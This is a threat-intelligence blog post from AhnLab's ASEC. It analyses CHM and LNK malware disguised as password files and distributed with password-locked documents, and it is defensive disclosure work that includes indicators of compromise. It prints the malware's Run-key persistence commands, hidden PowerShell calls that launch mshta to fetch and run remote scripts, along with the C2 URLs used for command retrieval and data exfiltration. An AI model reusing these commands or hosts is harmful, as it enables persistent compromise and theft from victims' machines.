AhnLab Security Emergency response Center (ASEC) discovered a malware strain disguised as a password file and being distributed alongside a normal file within a compressed file last month. It is difficult for users to notice that this file is malicious because this type of malware is distributed together with a normal file. The recently discovered malware was in CHM and LNK file formats. In the case of the CHM file, it shares the same type as the malware covered in the below post and is assumed to have been created by the same threat group.
It is believed that the CHM and LNK files are distributed while compressed together with a normal, password-locked file. Users are led to execute the CHM or LNK files since they appear as if they hold the passwords for the password-protected Excel and HWP files.
Figure 1. Inside the compressed files
While the two types were distributed in the same format, the malicious behaviors ultimately executed suggest that they were created by different groups.
- CHM Type
Executing passwd.chm or Password.chm, as shown in Figure 1, displays the password to the locked file and simultaneously triggers the execution of the malicious script they contain.
Figure 2. Help screen displayed when passwd.chm is executed
Figure 3. Contents of Shoes.xlsx that is displayed upon unlocking the file
Figure 4. Help screen displayed when Password.chm is executed
Figure 5. Contents of 2020_normal_ko.hwp that is displayed upon unlocking the file
Below is an example of the malicious script found in the CHM files. Using the mshta process, it triggers the execution of an additional script that exists within a malicious URL.
Figure 6. Malicious script within the CHM file
The additional script run through the mshta process is in the same format as the command shared in the post <CHM Malware Disguised as Security Email from a Korean Financial Company: RedEyes(ScarCruft)>. This script is responsible for registering to the RUN key, receiving commands from the threat actor’s server, and transmitting the command execution results.
Figure 7. Malicious script found within 1.html
- RUN key registration
Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value name: icxrNpVd
Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc.kr/skin/product/1.html - C2
Receives threat actor’s commands – hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer Name]+[Username]
Transmits command execution results – hxxp://shacc[.]kr/skin/product/mid.php?R=[Base64-encoded]
Figure 8. Malicious script found within 11.html
- RUN key registration
Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value name: aeF
Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 496433 2.2.2.2 || mshta hxxp://141.105.65.165/data/11.html - C2
Receives threat actor’s commands – hxxp://141.105.65.165/data//mid.php?U=[Computer Name]+[Username]
Transmits command execution results – hxxp://141.105.65.165/data/mid.php?R=[Base64-encoded]
- LNK Type
The password.txt.lnk file shown in Figure 1 creates a text file containing the password and the malicious script file in the %temp% folder when executed.
Figure 9. Additional script and password.txt file that is created
Figure 10. Contents of PersonalDataUseAgreement.hwp that is displayed upon unlocking the file
As shown below, the VBS file is responsible for running the additional malicious script that exists within hxxp://hondes.getenjoyment[.]net/denak/info/list.php?query=1.
Figure 11. Created VBS file
Looking at the URL format, the LNK type is the same as the malware covered in the post below, which leads the team to believe that it was created by the same threat group.
This type of malware can perform a variety of malicious behaviors according to the threat actor’s intentions. Furthermore, since various other threat groups are utilizing this method of distributing malware alongside a normal file, the team predicts there are other forms of this malware aside from the CHM and LNK files that have already been confirmed. As shown above, since various forms of malware are being distributed to Korean users, users are advised to always check the sender of the emails they receive and be especially cautious about opening attached files.
[File Detection]
Trojan/CHM.Agent (2023.03.08.03)
Dropper/LNK.Agent (2023.02.28.00)
[IOC]
MD5
809528921de39530de59e3793d74af98 – CHM
b39182a535f41699280ca088eef0f258 – CHM
2b79e2bd6548118c942480a52b5a1669 – LNK
C2
hxxp://shacc.kr/skin/product/1.html
hxxp://141.105.65.165/data/11.html
hxxp://hondes.getenjoyment.net/denak/info/list.php?query=1
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post Malware Distributed Disguised as a Password File appeared first on ASEC BLOG.
Article Link: Malware Distributed Disguised as a Password File - ASEC BLOG